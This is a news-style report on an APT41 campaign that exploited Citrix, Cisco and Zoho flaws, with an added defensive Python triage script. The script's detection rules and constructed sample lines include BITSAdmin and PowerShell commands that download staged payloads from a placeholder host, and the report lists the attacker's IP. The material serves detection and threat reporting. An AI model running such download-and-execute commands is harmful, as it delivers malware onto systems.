APT41, a China-linked hacking group, launched a wide-ranging cyberattack campaign against organisations in countries including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, the Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, the UAE, the UK, and the USA, using exploits that trigger vulnerabilities in Cisco, Citrix and Zoho products.
The three main products exploited in this campaign are Citrix Application Delivery Controller (ADC), Cisco routers and Zoho ManageEngine Desktop Central. Researchers found that the attacks took place between January 20 and March 11 and targeted the Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility sectors.
Initially, the threat actors were observed attempting to exploit the Citrix ADC vulnerability CVE-2019-19781. The exploitation attempt involved executing the command ‘file /bin/pwd’, which lets them tell vulnerable systems from patched ones in the victim’s network. In February, APT41 actors began downloading an unknown payload over File Transfer Protocol (FTP); the payload, named “bsd”, looked like a backdoor.
Cisco RV320 routers were exploited on February 21, 2020, but the researchers could not identify the specific exploit used. Attackers used a Metasploit module that combines CVE-2019-1653 and CVE-2019-1652 to achieve remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload. Finally, the APT actors attacked Zoho ManageEngine Desktop Central versions before 10.0.474 (CVE-2020-10189), which contained a zero-day remote code execution vulnerability.
FireEye observed APT41 using 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability. Five FireEye customers were reportedly compromised during the attempt. The APT41 attackers directly uploaded “logger.zip”, a simple Java-based program containing a set of commands that use PowerShell to download and execute install.bat and storesyncsvc.dll.
The attackers also leveraged the Microsoft BITSAdmin command-line tool to download install.bat, which installs persistence for a trial version of the Cobalt Strike BEACON loader.
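As an added example (not from the article or from FireEye), here is a small Python triage script that applies the detections a defender would derive from the ManageEngine stage described above: BITSAdmin or PowerShell command lines that fetch the named staged files, and web-server requests from the reported scanning address. The process and access-log lines are constructed, and the download host example.invalid is a placeholder.

```python
import re

# Indicators taken from the campaign description above: the scanning address
# FireEye reported (defanging removed for matching) and the file names staged
# on ManageEngine hosts.
SOURCE_IP = "91.208.184.78"
STAGED_FILES = ("logger.zip", "install.bat", "storesyncsvc.dll")

# Behavioural rules over process command lines: (rule name, pattern).
PROCESS_RULES = [
    ("bitsadmin_download",
     re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*\bhttps?://", re.I)),
    ("powershell_download",
     re.compile(r"powershell(\.exe)?.*(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)", re.I)),
    ("staged_file_name",
     re.compile("|".join(re.escape(f) for f in STAGED_FILES), re.I)),
]

# Constructed sample data: one benign admin command and two lines that mirror
# the download behaviour described in the article.
SAMPLE_PROCESSES = [
    "powershell.exe -Command Get-Service",
    "bitsadmin.exe /transfer job /download /priority high "
    "http://example.invalid/install.bat C:\\Windows\\Temp\\install.bat",
    "powershell.exe -nop -c (New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/storesyncsvc.dll','C:\\Windows\\Temp\\storesyncsvc.dll')",
]
SAMPLE_WEB_LOG = [  # constructed access-log lines, client address first
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200',
    '91.208.184.78 - - "POST /login HTTP/1.1" 200',
]

def classify_process(cmdline):
    """Return the names of all rules matched by one process command line."""
    return [name for name, rx in PROCESS_RULES if rx.search(cmdline)]

def find_source_hits(web_log_lines):
    """Return (line_number, line) pairs for requests from SOURCE_IP."""
    return [(n, line) for n, line in enumerate(web_log_lines, 1)
            if line.split() and line.split()[0] == SOURCE_IP]

def triage(processes=SAMPLE_PROCESSES, web_log=SAMPLE_WEB_LOG):
    """Run both checks; returns ({cmdline: [rules]}, [(line_no, log_line)])."""
    flagged = {}
    for cmd in processes:
        rules = classify_process(cmd)
        if rules:
            flagged[cmd] = rules
    return flagged, find_source_hits(web_log)

if __name__ == "__main__":
    for cmd, rules in triage()[0].items():
        print(rules, cmd)
```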
All three vulnerabilities have been patched, and organisations must apply the patches as quickly as possible to protect their networks from unauthorised access.